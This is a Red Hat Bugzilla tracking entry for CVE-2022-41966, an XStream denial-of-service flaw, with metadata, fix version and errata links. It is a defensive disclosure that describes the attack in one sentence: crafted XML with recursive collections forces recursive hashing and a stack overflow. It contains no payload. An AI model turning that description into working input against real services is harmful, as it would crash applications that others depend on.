Bug 2170431 (CVE-2022-41966) - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow
Summary: CVE-2022-41966 xstream: Denial of Service by injecting recursive collections ...
Alias: CVE-2022-41966
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 2170626 2170627 2170744
Blocks: 2170432
TreeView+ depends on / blocked
Reported: 2023-02-16 11:11 UTC by TEJ RATHI
Modified: 2023-03-16 13:29 UTC (History)
85 users (show)

Fixed In Version: xstream 1.4.20
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in the xstream package. This flaw allows an attacker to cause a denial of service by injecting recursive collections or maps, raising a stack overflow.
Clone Of:
Last Closed: 2023-03-16 13:29:37 UTC

Attachments (Terms of Use)

System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2023:1006 0 None None None 2023-03-08 14:55:28 UTC
Red Hat Product Errata RHSA-2023:1177 0 None None None 2023-03-09 10:47:10 UTC
Red Hat Product Errata RHSA-2023:1286 0 None None None 2023-03-16 09:31:31 UTC

Description TEJ RATHI 2023-02-16 11:11:59 UTC
XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.


Comment 1 Anten Skrabec 2023-02-16 20:16:42 UTC
Created xstream tracking bugs for this issue:

Affects: epel-all [bug 2170627]
Affects: fedora-all [bug 2170626]

Comment 10 errata-xmlrpc 2023-03-08 14:55:23 UTC
This issue has been addressed in the following products:

  Red Hat build of Quarkus 2.7.7

Via RHSA-2023:1006 https://access.redhat.com/errata/RHSA-2023:1006

Comment 11 errata-xmlrpc 2023-03-09 10:47:06 UTC
This issue has been addressed in the following products:

  RHINT Camel-Q 2.7-1

Via RHSA-2023:1177 https://access.redhat.com/errata/RHSA-2023:1177

Comment 13 errata-xmlrpc 2023-03-16 09:31:28 UTC
This issue has been addressed in the following products:

  Migration Toolkit for Runtimes 1 on RHEL 8

Via RHSA-2023:1286 https://access.redhat.com/errata/RHSA-2023:1286

Comment 14 Product Security DevOps Team 2023-03-16 13:29:32 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):


Note You need to log in before you can comment on or make changes to this bug.